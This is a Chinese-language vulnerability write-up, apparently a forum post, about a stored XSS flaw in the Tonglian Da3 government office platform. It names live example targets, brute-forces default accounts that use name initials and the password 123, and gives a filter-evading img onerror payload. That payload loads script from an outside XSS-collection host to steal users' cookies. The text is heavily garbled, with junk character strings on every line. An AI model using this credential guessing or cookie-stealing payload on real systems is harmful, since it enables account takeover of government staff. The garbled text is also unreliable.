& x% z" B# i' ?1 P7 {2 e
! a. L9 p o8 h; I. s: X/ l 同联Da3协同办公平台后台通用储存型xss漏洞
! Y! q% R& ~" `- [
; T) X5 k/ r& A) F % f) P9 a! x6 Y/ U2 O( h
平台简介:. O1 g- }* u# k
8 |1 s$ ^4 ?- d% n) d
4 e0 q& w' g) K- ^5 m 7 a& _) Q5 {+ q1 G# q1 G
# W2 S4 \ N$ w8 ~ $ K% I# a. m$ b {: q D
北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
9 X, {. E6 I% l: Z同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
+ w) g3 _, B) t) X. u2 p- |% z
同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!/ J- @, Z' V" V( x# r
o2 u; A- J: q* p8 ~: }' @
9 ~, v* s, L9 O2 o * L0 q4 x8 \: V% T9 ^0 s
* ^) \* ]! f# ]& P1 D h9 ]9 @
$ ^5 k- E& B* ] 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:5 f3 f* [# P, C9 {) |) d0 z
2 {6 z! H1 w7 O" ] + \# Z2 p1 a9 m1 A
+ J) f! H8 g+ S8 z* N! N
4 o l* P& B! N/ A. q& a8 X! c
( r% u" q3 V( K/ r http://1.1.1.1:7197/cap-aco/#(案例2-)$ P, ]4 k5 M/ C0 X
7 B; [5 s6 k7 L: S5 _) T) {
W6 N9 V! i$ h& L" R0 A http://www.XXOO.com (案例1-官网网站)
$ I" Y9 s' s! j8 x+ @
; _& r0 g/ M) g6 P8 `2 ]1 g ! o# o; g- {# o% C6 X7 L& y$ d- k
漏洞详情:& h5 h% G7 P/ j8 M
7 B' n: G! g8 {- ?) Z
2 [) h; P& t+ g% d
案例一、
+ u3 l- S; ]( X- o+ I K, Y& T
2 H6 b2 O( [& O; z/ M
. _7 F7 \! a/ }8 i& m 初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
$ }! ^! b! d% k8 ?
8 y" `$ g e+ G
' f, Y# U' }) d 首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:
& d. i! l R- k& k, @
/ U" y |; ]6 K Q% Q
# C+ c/ Q" ?$ P : W6 P' Q: i( ^$ I' I/ H& p3 z3 B4 g
# ^4 \6 s: O- `/ ~1 U. W& ~
; {& z( h7 m) y7 V5 O' H
9 G0 E5 B0 {4 A. I# P+ Z
' [8 b. O( _; A `8 Y 8 v3 r' @# }8 Q
status为302即表示破解成功,然后找个破解成功的账号登录系统。然后在通知公告---通知公告发布-拟稿处存在储存型xss漏洞,我在编机器里填写好标题、选择人员,点html如图:
$ W* {! k' Y% i6 K' S/ V& O- C3 K
9 D8 l+ M$ u3 i2 c( g
X% F6 K9 C) T* I; s
$ k: c. j* A3 h+ v5 ?
* U' ]- R6 W) A# Y) ~4 a3 W& X% T# d
) |; {7 F- q1 O4 G5 j" l. p
/ l( Y6 \, ?8 T6 S5 f: O) k: b
* P+ P- @: H" ]2 |, |: W4 C1 T9 v& H 9 j+ c, T2 O6 q) ^- U2 f: N! D
然后插我们的xss跨站代码(经过测试发现过滤了好多标签,比如script,没过滤img、iframe标签),这里我们用img标签来测试,payload如下 0 B7 v9 M2 ^) P0 |
& ]+ o: `9 V4 m4 }! I9 [& h4 ]6 Q 6 t7 P$ H3 d4 v
^# v- R0 v# W9 H
|) k+ B( y: x& }# j7 s
9 S; G/ q: j9 A. {% J
<img src=x
3 S( D9 g/ R; b" D5 }! Monerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.6kb.org/7OO7GQ?1510065652';>,如图: 8 g. }4 y- \" u1 Z, p! n: z" f
. g, \. D3 |! x2 K5 }- T
" p* c: s, T, S6 \7 V+ r' o/ ] k6 S
9 G. ^9 x( l ~
& R l2 t3 Q' H3 l % i% F" D- }9 v, h1 G, U' W
然后发送,接收cookie如图: 2 i* I9 {9 d, ?* ?, `
* {6 G( i0 X1 a. s
0 _+ W4 E- g- q 2 ]# S& Z' X2 u0 {
' I" l0 B" J' B8 [ c
: c Q) r+ L: I# U4 D
8 T6 G) k& F. ` F2 o3 k' Y7 k
6 E: r n5 w6 { w" s' _ O . d1 H4 ?$ l% D% [& W+ r
) g9 k' k; g% B( S+ h2 c" q6 z
! O$ k0 ]5 L4 C. v, @
8 y3 ~# n- [, h" d$ k , j* h$ s' E5 a5 ?0 D0 J
2 T$ ]' J4 J& r6 i
. s( s3 Z* ^9 a# }4 R
) s% n9 Q8 L; H( M+ x
p% h9 A4 j$ Y1 H
' E" B6 U: b/ F1 c) y' N . ?' `" g" p0 m: A* R
7 ]! o$ N$ e! T T" l* Q$ l* x
0 r) J8 Y' l+ S# t5 Q3 B1 K
2 W; f( X4 \3 m6 T+ k$ Q
. z+ ~. ]2 A5 K( Q
8 d; f; O2 j& i: `' N% {) O, u+ {
案例2、 2 P; R$ C1 G9 j: k3 s9 _0 ^
+ ], s! i8 r! r( {5 x) D4 ^4 v4 V
6 N8 ^. \, f: g+ n: A) K7 j) K3 o 前面步骤都一样,下面看效果图: 5 Y1 b. U n, g( U3 V
# m0 D$ U2 I# s# M% g6 G/ y
9 s! s7 i* r @ : ^) l1 j, L. Z
" v# X; l% Y* d; O I 2 U) Q# h3 X( f9 e
; t$ D0 l. `+ Q4 `
! C) B: y' u! O) N7 f3 J: q
3 m. y* f& H0 d% m8 n- t+ B! c
7 B- N& T; m3 j0 r( H+ o! R
' |. ]7 m3 ^% p2 w- G! Q
$ }% m! w9 m5 E: [ , k$ b1 K- J O3 S/ X
/ |* \' y, Q# `. l+ \" `& u( n& O
" \' }7 a7 |/ @5 F) r* |4 G
Y+ U8 ]% T* ?# k7 r& b; H
& O: ~4 b5 s1 c 0 f6 L1 r6 q7 ], e! E% H
" \1 s: I0 @3 E% J# p
4 Z5 v7 D+ c+ Q* F* C
4 E! w3 Y) r+ D $ w* o n: N5 R
: ~" ]' [6 p6 o. c% Z3 J
/ I5 Z8 t2 m- ~% v& x+ k3 |
1 x. r; p2 L) T+ p
! j, {8 Q# j! K; r9 A 6 `" G( p/ I# _ J0 f) L( W
8 g- k s( [6 M" ^* _ ~
# }. U; B; t4 }4 l: O7 S% f